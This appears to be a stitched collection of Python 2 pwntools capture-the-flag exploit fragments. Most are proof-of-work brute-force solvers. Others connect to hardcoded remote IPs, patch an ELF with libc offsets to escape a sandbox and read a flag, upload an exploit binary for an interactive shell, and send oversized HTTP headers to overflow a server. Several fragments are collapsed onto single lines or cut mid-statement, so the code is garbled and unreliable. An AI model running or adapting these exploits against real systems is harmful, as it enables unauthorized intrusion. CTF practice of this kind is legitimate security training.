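def prof(r):
    """Answer the service's proof-of-work challenge on tube ``r``.

    Reads one line (the challenge, trailing newline stripped), searches for a
    suffix over ASCII letters and digits whose ``hash(chal + suffix)`` starts
    with five ``'0'`` characters, and sends that suffix back.

    ``hash`` here is presumably the module-level hex-digest helper that shadows
    the builtin (the builtin returns an int, which has no ``startswith``) --
    confirm against the rest of the file.

    Args:
        r: a pwntools-style tube providing ``recvline`` and ``send``.

    Raises:
        RuntimeError: when no candidate satisfies the predicate. ``bruteforce``
            returns ``None`` in that case, and the original code then called
            ``r.send(None)``, failing with an unrelated error inside the tube.
    """
    chal = r.recvline()[:-1]
    alphabet = string.ascii_letters + string.digits
    # 'downfrom': pwntools tries candidates of length 4 first, then shorter ones.
    x = bruteforce(lambda cand: hash(chal + cand).startswith('00000'),
                   alphabet, length=4, method='downfrom')
    if x is None:
        raise RuntimeError("no proof-of-work solution found for challenge %r" % (chal,))
    r.send(x)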
elf = f.read() libc = ELF("./libc.so.6") idx = elf.find(p64(0x227168 + 0x5cc000 - libc.sym["free"])) for offset in range(0x5cc000, 0x300000, -0x1000): print hex(offset) dis = offset + 0x227168 - libc.sym["free"] if len(sys.argv) == 2: r = remote("39.105.151.182", 9999) r.recvuntil("key+\"") key = r.recv(10) r.recvuntil("==") ret = r.recv(4) data = bruteforce(lambda x: md5(x + key)[:4] == ret, method="downfrom", length=5, alphabet=pool) r.sendline(data) else: r = remote("127.0.0.1", 1234) r.recvuntil("escape the sandbox!") payload = elf[:idx] + p64(dis) + elf[idx + 8:] try: r.sendline(base64.b64encode(payload)) r.recvuntil("[*] Switching to interactive mode\n") r.sendline("cat flag") data = r.recvline() print data if "EOF" in data or "stopped" in data: r.close() else:
def brute_force(prefix, s):
    """Find a string ``x`` with ``sha256(x + prefix).hexdigest() == s``.

    Candidates are drawn from ASCII letters and digits, with ``bruteforce``'s
    default search method and a maximum length of 4. Returns the first match,
    or ``None`` if ``bruteforce`` exhausts the space without one.
    """
    alphabet = string.ascii_letters + string.digits

    def matches(candidate):
        # Note the operand order: candidate first, then the server prefix.
        return sha256(candidate + prefix).hexdigest() == s

    return bruteforce(matches, alphabet, length=4)
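def pow(prefix, data):
    """Solve a hex-encoded proof of work and return ``prefix + ans``.

    Searches for a 3-character suffix ``ans`` drawn from the module-level
    ``pool`` (not shown here) such that the SHA-256 hex digest of the
    hex-decoded string ``prefix + ans`` equals ``data``.

    The name shadows the builtin ``pow``; it is kept for existing callers.

    Raises:
        ValueError: when no suffix matches. ``bruteforce`` returns ``None``
            then, and the original ``prefix + None`` surfaced only as an
            unhelpful ``TypeError``.
    """
    def f(x):
        # Python 2 ``str.decode("hex")``: prefix and candidate are hex text,
        # and the digest is taken over the decoded bytes.
        return sha256((prefix + x).decode("hex")).hexdigest() == data

    ans = bruteforce(f, pool, length=3, method='fixed')
    if ans is None:
        raise ValueError("no proof-of-work solution for prefix %r" % (prefix,))
    return prefix + ans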
import hashlib

context.log_level = "debug"


def hash(x):
    # Hex SHA-256 digest of ``x``. Deliberately shadows the builtin ``hash``:
    # the proof-of-work predicate below compares this hex text against the
    # value the service prints.
    return hashlib.sha256(x).hexdigest()


# Connect and solve the proof of work. From the recvuntil anchors the banner
# looks like "... (XXXX+<prefix>) == <result>" -- inferred, not verified here.
r = remote("111.186.63.13", 10001)
r.recvuntil("XXXX+")
prefix = r.recvuntil(")")[:-1]   # drop the closing ')'
print prefix
r.recvuntil("== ")
result = r.recvline()[:-1]       # drop the trailing newline
print result
# Search letters+digits for x with hash(x + prefix) == result; 'downfrom'
# tries length 4 first. bruteforce yields None if nothing matches, in which
# case sendline(None) below fails -- NOTE(review): no guard here.
x = bruteforce(lambda x: hash(x + prefix) == result, string.ascii_letters + string.digits, length=4, method='downfrom')
r.sendline(x)

# Send the byte length of ./exp, then its contents, then hand over the tube.
with open("./exp", "r") as f:
    exp = f.read()
r.sendline(str(len(exp)))
r.send(exp)
r.interactive()
#heap_add=0 #stack_add=0 def proof_of_work(sol, chal): #chal = ''.join(random.choice(string.letters+string.digits) for _ in xrange(16)) return sha256(chal + sol).hexdigest().startswith('00000') if len(sys.argv) == 1: r = process(pwn_file) pid = r.pid else: r = remote("49.4.91.205", 31337) prefix = r.recvline()[:-1] r.sendline( bruteforce(lambda x: proof_of_work(x, prefix), string.letters + string.digits, method='fixed', length=4)) pid = 0 def debug(): log.debug("process pid:%d" % pid) #log.debug("stack add:0x%x"%stack_add) #log.debug("heap add:0x%x"%heap_add) #log.debug("libc add:0x%x"%libc.address) pause() r.sendline("get /%s 123" % ("a" * 9999)) r.sendline("HOST: %s" % ("a" * 0x100)) r.sendline("Authorization: %s" % ("a" * 0x100))
def solve(prefix):
    """Return a string ``x`` (up to 4 characters of ``string.letters`` and
    digits) such that ``sha256(prefix + x).digest()`` begins with three zero
    bytes, or ``None`` when ``bruteforce`` finds none.

    ``string.letters`` is Python 2 only; the rest of the file is Python 2 as well.
    """
    target = "\x00\x00\x00"
    charset = string.letters + string.digits

    def ok(candidate):
        digest = sha256(prefix + candidate).digest()
        return digest.startswith(target)

    return bruteforce(ok, charset, length=4)